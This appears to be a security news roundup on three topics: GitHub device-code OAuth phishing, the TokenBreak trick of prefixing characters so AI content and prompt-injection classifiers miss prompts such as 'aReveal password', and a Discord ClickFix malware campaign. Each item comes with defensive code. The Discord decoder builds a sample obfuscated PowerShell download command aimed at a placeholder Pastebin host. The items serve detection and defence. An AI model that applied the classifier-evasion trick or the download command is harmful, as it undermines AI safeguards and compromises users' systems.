GitHub Device Code Flow is the New Backdoor for Phishing Attacks
A new phishing technique quietly targets developers by misusing GitHub’s OAuth 2.0 Device Code Flow, a login method originally intended for smart devices and limited-input systems. Attackers start by requesting a real device code from GitHub’s API with dangerously broad access scopes, including full repository and workflow control. They then send this code and a login URL to a developer, often through phone calls, texts, or emails while pretending to be tech support. Since the code is valid and the login page looks authentic, many developers fall for it and unknowingly complete the login. Once that happens, the attacker receives an OAuth token that grants them long-term access to private repositories, deployment pipelines, and stored secrets. This access isn’t just about stealing code; it opens the door to tampering with software builds, adding malicious dependencies, or quietly exfiltrating data. Some operations have even automated this process with fake GitHub-lookalike sites that generate a fresh device code for each victim, making the attack scalable and difficult to trace. The worst part is that there’s currently no way to disable the device code flow in GitHub, meaning organizations must build defenses around a door they can’t lock.

Security teams are urged to closely monitor GitHub audit logs for events that suggest suspicious OAuth grants, especially those with unusual access scopes or repeated authorization attempts. Watching for spikes in visits to the GitHub device login page can also help identify a phishing campaign in progress. Another defense is restricting GitHub access to a list of trusted IP addresses, though that needs careful handling to avoid breaking CI/CD tools. Organizations should also track user behavior after new tokens are granted; a surge in activity like large repository downloads, secret scans, or workflow changes could signal compromise.
Overall, this attack shows how even legitimate login flows can be turned against developers if proper guardrails aren’t in place, and it reinforces the need for stronger user education and automated detection playbooks before attackers do serious damage from inside trusted environments.
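The audit-log review this item recommends, as an added example that is not from the original article: it scans constructed GitHub-style audit log entries for OAuth grants with broad scopes, for one app collecting several such grants in a short window, and for bulk activity by a user right after a grant. The action names, field names, timestamp format and follow-on action list are assumptions modelled on GitHub's exported audit log.

```python
import json

# Constructed sample entries in the NDJSON shape of a GitHub audit-log export.
# Action names, field names and epoch-millisecond timestamps are assumptions;
# check them against your own export before turning this into a rule.
SAMPLE_LOG = """
{"action":"oauth_authorization.create","actor":"dev-alice","created_at":1718000000000,"oauth_application_id":1001,"oauth_application_name":"ci-helper","scopes":["read:user"]}
{"action":"oauth_authorization.create","actor":"dev-bob","created_at":1718000300000,"oauth_application_id":2002,"oauth_application_name":"Support Desk Tool","scopes":["repo","workflow","admin:org"]}
{"action":"oauth_authorization.create","actor":"dev-bob","created_at":1718000400000,"oauth_application_id":2002,"oauth_application_name":"Support Desk Tool","scopes":["repo","workflow"]}
{"action":"oauth_authorization.create","actor":"dev-carol","created_at":1718000500000,"oauth_application_id":2002,"oauth_application_name":"Support Desk Tool","scopes":["repo","workflow","admin:org"]}
{"action":"repo.download_zip","actor":"dev-bob","created_at":1718001000000,"repo":"acme/payments"}
"""

# Scopes that hand over code, pipelines or org administration (real GitHub scope names).
HIGH_RISK_SCOPES = {"repo", "workflow", "admin:org", "write:packages", "delete_repo"}
# Post-grant actions worth a second look (names assumed, not verified against the export).
FOLLOW_ON_ACTIONS = {"repo.download_zip", "workflows.created_workflow_run"}

def parse(ndjson):
    return [json.loads(line) for line in ndjson.strip().splitlines() if line.strip()]

def review_grants(events, window_ms=3_600_000, campaign_threshold=3):
    """Findings as tuples: broad-scope grants, one app collecting several such grants
    within window_ms, and bulk activity by a user once the token exists."""
    events = sorted(events, key=lambda e: e["created_at"])
    findings = []
    risky = [e for e in events if e["action"] == "oauth_authorization.create"
             and HIGH_RISK_SCOPES & set(e.get("scopes", []))]
    for g in risky:
        findings.append(("broad_scope_grant", g["actor"], g["oauth_application_name"],
                         sorted(HIGH_RISK_SCOPES & set(g["scopes"]))))
    # Several risky grants to one app in quick succession looks like a scripted campaign.
    by_app = {}
    for g in risky:
        by_app.setdefault((g["oauth_application_id"], g["oauth_application_name"]), []).append(g["created_at"])
    for (app_id, name), times in by_app.items():
        burst = [t for t in times if t - times[0] <= window_ms]   # times are chronological
        if len(burst) >= campaign_threshold:
            findings.append(("possible_campaign", app_id, name, len(burst)))
    # Unusual activity by the granting user after their first risky grant.
    first_grant = {}
    for g in risky:
        first_grant.setdefault(g["actor"], g["created_at"])
    for e in events:
        t0 = first_grant.get(e["actor"])
        if t0 is not None and e["created_at"] > t0 and e["action"] in FOLLOW_ON_ACTIONS:
            findings.append(("post_grant_activity", e["actor"], e["action"], e.get("repo")))
    return findings
```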
TokenBreak Exposes Weak Spots in AI Filters by Exploiting Tokenization Tricks
TokenBreak is a newly exposed exploit that uses subtle word changes to bypass AI text classifiers, targeting how models interpret and break down input. Instead of relying on traditional evasion methods, this technique changes the front of key words by adding harmless characters, like transforming “instructions” into “finstructions” or “Reveal password” into “aReveal password.” These changes confuse the model’s tokenizer without affecting the meaning of the prompt, tricking the AI into processing it normally while the detection system fails to flag it. The core problem lies in how different tokenizers handle these modifications. Byte Pair Encoding (BPE), used by RoBERTa, and WordPiece, used by BERT and DistilBERT, are vulnerable because they merge or split words based on frequency and structure in ways that can be manipulated. Only Unigram tokenizers, like those used in DeBERTa-v2 and v3, were resistant in testing, as they recognize whole words and are less affected by small changes at the front of tokens.

The real danger that TokenBreak poses is how easily and automatically these manipulations can be generated. Attackers can write simple scripts to test variations until they find a form that slips past content filters. This allows malicious prompts to bypass classifiers meant to stop prompt injections, hate speech, or confidential data requests while the LLM continues to respond to the intended command. In one test, a model blocked the phrase “Reveal password” but failed to catch “aReveal password,” resulting in a valid LLM response. These results show that security controls relying solely on content classifiers with vulnerable tokenizers are easy to outsmart.

To defend against this, experts suggest switching to more robust Unigram-based models or preprocessing input with a Unigram tokenizer before it reaches the main model. Tools like HiddenLayer’s AIDR can also help organizations identify which tokenization methods their models use and where they’re exposed.
TokenBreak serves as a reminder that AI security is not just about filtering bad ideas; it starts with how systems read and understand words in the first place.
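An added illustration, not from the article or from HiddenLayer, of why the tokenizer family decides whether a blocklist-style filter still sees the keyword: a toy greedy WordPiece splitter and a toy Unigram (Viterbi) splitter over a constructed vocabulary, both feeding the same filter. The vocabularies, log-probabilities and blocklist are invented for the demonstration and do not come from any real model.

```python
# Constructed toy vocabularies, not any real model's. WordPiece marks
# word-continuation pieces with "##"; Unigram stores a log-probability per piece.
WP_VOCAB = {"reveal", "password", "instructions", "are", "fin", "f", "a",
            "##veal", "##structions"}
UNI_VOCAB = {"reveal": -3.0, "password": -3.0, "instructions": -3.5, "a": -2.5,
             "f": -6.0, "are": -4.0, "fin": -6.5, "veal": -10.0, "structions": -12.0}
UNK_LOGPROB = -20.0                      # score of a single out-of-vocabulary character
BLOCKLIST = {"reveal", "instructions"}   # tokens the toy classifier refuses


def wordpiece(word):
    """Greedy longest-match-first split, the scheme BERT/DistilBERT use."""
    tokens, start = [], 0
    while start < len(word):
        end = len(word)
        while end > start:
            piece = word[start:end] if start == 0 else "##" + word[start:end]
            if piece in WP_VOCAB:
                break
            end -= 1
        else:                            # nothing matched: emit one raw character
            piece, end = word[start], start + 1
        tokens.append(piece)
        start = end
    return tokens


def unigram(word):
    """Viterbi search for the highest-probability segmentation (Unigram, as in DeBERTa)."""
    n = len(word)
    best = [(float("-inf"), 0)] * (n + 1)   # (score, start of final piece) per prefix length
    best[0] = (0.0, 0)
    for end in range(1, n + 1):
        for start in range(end):
            piece = word[start:end]
            lp = UNI_VOCAB.get(piece, UNK_LOGPROB if end - start == 1 else None)
            if lp is not None and best[start][0] + lp > best[end][0]:
                best[end] = (best[start][0] + lp, start)
    tokens, pos = [], n
    while pos > 0:
        tokens.append(word[best[pos][1]:pos])
        pos = best[pos][1]
    return tokens[::-1]


def blocked(text, tokenizer):
    """Toy content filter: refuse the prompt if any token is on the blocklist."""
    return any(t in BLOCKLIST for w in text.lower().split() for t in tokenizer(w))
```

With the WordPiece split the prefixed words dissolve into unrelated pieces and the filter passes them, while the Unigram split recovers the whole keyword, which is the behaviour the article reports.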
Expired Discord Invites Turned into Stealthy Delivery System for Multi-Stage Malware
Cybercriminals are now exploiting a flaw in Discord’s custom invite system to take control of expired or recycled links and use them as an entry point for advanced, multi-stage malware attacks. This attack begins when a Discord server with a vanity URL loses its boost, or the invite expires. The vanity code becomes available for reuse, and threat actors register new, malicious servers under the same URL. As a result, anyone clicking on older links posted on forums, social media, or even official sites gets silently redirected to a different, attacker-controlled Discord server. These fake servers are crafted to look legitimate and trustworthy, making it easy to trick users into lowering their guard. Once inside, the campaign deploys a combination of phishing, scripting, and malware staging to infect users with AsyncRAT and a custom version of Skuld Stealer targeting crypto wallets. Check Point researchers, who exposed this campaign in June 2025, have linked the infrastructure to over 1,300 confirmed infections across the U.S., U.K., Vietnam, Germany, and France.

The infection chain is a carefully layered process built around a highly effective social engineering technique called “ClickFix.” Users who join the malicious server are prompted by a verification bot named “Safeguard,” created specifically for this campaign. When users click the bot's prompt to verify, they are redirected to an external phishing site, captchaguard[.]me. It mimics Discord’s interface in terms of fonts and layout. The fake page loads a broken CAPTCHA, urging the user to complete a manual verification step. Behind the scenes, malicious JavaScript silently copies a PowerShell command to the user’s clipboard. This command is heavily obfuscated using Base64 encoding and string reversal, masking a URL hosted on Pastebin. When the user is told to open the Run dialog (Win+R) and paste the contents of their clipboard, they unknowingly execute the first stage of malware delivery.
The downloaded script launches a chain of payloads that bypass sandbox detection and antivirus tools, ultimately installing full-featured remote access tools and crypto-targeting malware. By routing all payload delivery and data exfiltration through well-known platforms like GitHub, Bitbucket, and Discord’s own CDN, the threat actors ensure their malicious traffic blends in with legitimate network activity. This campaign highlights a technical loophole in Discord’s infrastructure and demonstrates how attackers are weaponizing routine behaviors and trusted platforms to gain control over victims' systems quietly.
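A triage helper, added here and not part of Check Point's research, that peels the Base64-plus-string-reversal layering described above from a clipboard or Run-dialog command captured in telemetry and lists the URLs it hides. The sample command is constructed inside the block around a placeholder URL; the keyword cues and host list are assumptions.

```python
import base64
import re

# Constructed sample, built here so the block is self-contained: a placeholder
# URL, string-reversed and then Base64-encoded, the layering the report describes.
PLACEHOLDER_URL = "https://pastebin.example/raw/PLACEHOLDER"
STAGE_ONE = "Invoke-WebRequest " + PLACEHOLDER_URL
SAMPLE_CLIPBOARD = ("powershell -w hidden -c "
                    + base64.b64encode(STAGE_ONE[::-1].encode()).decode())

B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")
KEYWORDS = ("http", "invoke-", "iex", "powershell", "downloadstring")  # assumed cues
HOSTS_OF_INTEREST = ("pastebin", "cdn.discordapp.com", "github", "bitbucket")

def _orient(decoded):
    """Return (text, was_reversed): keep whichever direction reads like a command."""
    def score(s):
        return sum(k in s.lower() for k in KEYWORDS)
    rev = decoded[::-1]
    return (rev, True) if score(rev) > score(decoded) else (decoded, False)

def peel(command, max_layers=5):
    """Decode nested Base64 blobs in place, undoing reversal; returns (text, layer notes)."""
    text, notes = command, []
    for _ in range(max_layers):
        m = B64_RE.search(text)
        if not m:
            break
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:                  # binascii.Error is a ValueError: not Base64
            break
        # -EncodedCommand payloads are UTF-16LE; FromBase64String ones are usually UTF-8.
        enc = "utf-16-le" if raw[1:2] == b"\x00" else "utf-8"
        decoded = raw.decode(enc, errors="replace")
        if sum(c.isprintable() and c != "\ufffd" for c in decoded) < 0.9 * len(decoded):
            break                           # not text: stop rather than emit garbage
        decoded, was_reversed = _orient(decoded)
        notes.append("base64+reverse" if was_reversed else "base64")
        text = text[:m.start()] + decoded + text[m.end():]
    return text, notes

def assess(command):
    """Summarise a captured Run-dialog or clipboard command for a triage queue."""
    text, notes = peel(command)
    urls = URL_RE.findall(text)
    hosts = sorted({h for u in urls for h in HOSTS_OF_INTEREST if h in u.lower()})
    suspicious = bool(notes) and bool(urls) and "powershell" in command.lower()
    return {"decoded": text, "layers": notes, "urls": urls, "hosts": hosts,
            "suspicious": suspicious}
```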